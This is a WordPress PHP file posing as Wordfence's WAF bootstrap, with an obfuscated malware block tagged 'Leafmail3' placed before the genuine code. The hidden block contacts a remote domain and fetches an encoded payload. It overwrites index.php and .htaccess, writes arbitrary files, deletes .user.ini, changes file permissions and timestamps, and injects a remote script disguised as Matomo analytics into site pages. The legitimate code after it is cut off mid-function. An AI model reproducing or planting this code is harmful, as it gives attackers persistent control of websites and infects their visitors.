<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
/*
php_value auto_prepend_file ~/wp-content/plugins/wordfence/waf/bootstrap.php
*/
if (!defined('WFWAF_RUN_COMPLETE')) {
if (!defined('WFWAF_AUTO_PREPEND')) {
define('WFWAF_AUTO_PREPEND', true);
}
if (!defined('WF_IS_WP_ENGINE')) {
define('WF_IS_WP_ENGINE', isset($_SERVER['IS_WPE']));
}
if (!defined('WF_IS_FLYWHEEL')) {
define('WF_IS_FLYWHEEL', isset($_SERVER['SERVER_SOFTWARE']) && strpos($_SERVER['SERVER_SOFTWARE'], 'Flywheel/') === 0);
}
if (!defined('WF_IS_PRESSABLE')) {
define('WF_IS_PRESSABLE', (defined('IS_ATOMIC') && IS_ATOMIC) || (defined('IS_PRESSABLE') && IS_PRESSABLE));
}
require(dirname(__FILE__) . '/../lib/wfVersionSupport.php');
/**
* @var string $wfPHPDeprecatingVersion
* @var string $wfPHPMinimumVersion
*/
if (!defined('WF_PHP_UNSUPPORTED')) {
define('WF_PHP_UNSUPPORTED', version_compare(PHP_VERSION, $wfPHPMinimumVersion, '<'));
}
if (WF_PHP_UNSUPPORTED) {
return;
}
require_once(dirname(__FILE__) . '/wfWAFUserIPRange.php');
require_once(dirname(__FILE__) . '/wfWAFIPBlocksController.php');
require_once(dirname(__FILE__) . '/../vendor/wordfence/wf-waf/src/init.php');
class wfWAFWordPressRequest extends wfWAFRequest {
/**
* @param wfWAFRequest|null $request
* @return wfWAFRequest
*/
public static function createFromGlobals($request = null) {
if (version_compare(phpversion(), '5.3.0') >= 0) {
$class = get_called_class();
$request = new $class();
} else {
$request = new self();
}
return parent::createFromGlobals($request);
}
public function getIP() {
static $theIP = null;
if (isset($theIP)) {
return $theIP;
}
$ips = array();
$howGet = wfWAF::getInstance()->getStorageEngine()->getConfig('howGetIPs', null, 'synced');
if ($howGet) {
if (is_string($howGet) && is_array($_SERVER) && array_key_exists($howGet, $_SERVER)) {
$ips[] = array($_SERVER[$howGet], $howGet);
}
if ($howGet != 'REMOTE_ADDR') {
$ips[] = array((is_array($_SERVER) && array_key_exists('REMOTE_ADDR', $_SERVER)) ? $_SERVER['REMOTE_ADDR'] : '127.0.0.1', 'REMOTE_ADDR');
}
}
else {
$recommendedField = wfWAF::getInstance()->getStorageEngine()->getConfig('detectProxyRecommendation', null, 'synced');
if (!empty($recommendedField) && $recommendedField != 'UNKNOWN' && $recommendedField != 'DEFERRED') {
if (isset($_SERVER[$recommendedField])) {
$ips[] = array($_SERVER[$recommendedField], $recommendedField);
}
}
$ips[] = array((is_array($_SERVER) && array_key_exists('REMOTE_ADDR', $_SERVER)) ? $_SERVER['REMOTE_ADDR'] : '127.0.0.1', 'REMOTE_ADDR');
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ips[] = array($_SERVER['HTTP_X_FORWARDED_FOR'], 'HTTP_X_FORWARDED_FOR');
}
if (isset($_SERVER['HTTP_X_REAL_IP'])) {
$ips[] = array($_SERVER['HTTP_X_REAL_IP'], 'HTTP_X_REAL_IP');
}
}
$cleanedIP = $this->_getCleanIPAndServerVar($ips);
if (is_array($cleanedIP)) {
list($ip, $variable) = $cleanedIP;
$theIP = $ip;
return $ip;
}
$theIP = $cleanedIP;
return $cleanedIP;
}
/**
* Expects an array of items. The items are either IPs or IPs separated by comma, space or tab. Or an array of IP's.
* We then examine all IP's looking for a public IP and storing private IP's in an array. If we find no public IPs we return the first private addr we found.
*
* @param array $arr
* @return bool|mixed
*/
private function _getCleanIPAndServerVar($arr) {
$privates = array(); //Store private addrs until end as last resort.
foreach ($arr as $entry) {
list($item, $var) = $entry;
if (is_array($item)) {
foreach ($item as $j) {
// try verifying the IP is valid before stripping the port off
if (!$this->_isValidIP($j)) {
$j = preg_replace('/:\d+$/', '', $j); //Strip off port
}
if ($this->_isValidIP($j)) {
if ($this->_isIPv6MappedIPv4($j)) {
$j = wfWAFUtils::inet_ntop(wfWAFUtils::inet_pton($j));
}
if ($this->_isPrivateIP($j)) {
$privates[] = array($j, $var);
}
else {
return array($j, $var);
}
}
}
continue; //This was an array so we can skip to the next item
}
$skipToNext = false;
$trustedProxyConfig = wfWAF::getInstance()->getStorageEngine()->getConfig('howGetIPs_trusted_proxies_unified', null, 'synced');
$trustedProxies = $trustedProxyConfig === null ? array() : explode("\n", $trustedProxyConfig);
foreach (array(',', ' ', "\t") as $char) {
if (strpos($item, $char) !== false) {
$sp = explode($char, $item);
$sp = array_reverse($sp);
foreach ($sp as $index => $j) {
$j = trim($j);
if (!$this->_isValidIP($j)) {
$j = preg_replace('/:\d+$/', '', $j); //Strip off port
}
if ($this->_isValidIP($j)) {
if ($this->_isIPv6MappedIPv4($j)) {
$j = wfWAFUtils::inet_ntop(wfWAFUtils::inet_pton($j));
}
foreach ($trustedProxies as $proxy) {
if (!empty($proxy)) {
if (wfWAFUtils::subnetContainsIP($proxy, $j) && $index < count($sp) - 1) {
continue 2;
}
}
}
if ($this->_isPrivateIP($j)) {
$privates[] = array($j, $var);
}
else {
return array($j, $var);
}
}
}
$skipToNext = true;
break;
}
}
if ($skipToNext){ continue; } //Skip to next item because this one had a comma, space or tab so was delimited and we didn't find anything.
if (!$this->_isValidIP($item)) {
$item = preg_replace('/:\d+$/', '', $item); //Strip off port
}
if ($this->_isValidIP($item)) {
if ($this->_isIPv6MappedIPv4($item)) {
$item = wfWAFUtils::inet_ntop(wfWAFUtils::inet_pton($item));
}
if ($this->_isPrivateIP($item)) {
$privates[] = array($item, $var);
}
else {
return array($item, $var);
}
}
}
if (sizeof($privates) > 0) {
return $privates[0]; //Return the first private we found so that we respect the order the IP's were passed to this function.
}
return false;
}
/**
* @param string $ip
* @return bool
*/
private function _isValidIP($ip) {
return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}
/**
* @param string $ip
* @return bool
*/
private function _isIPv6MappedIPv4($ip) {
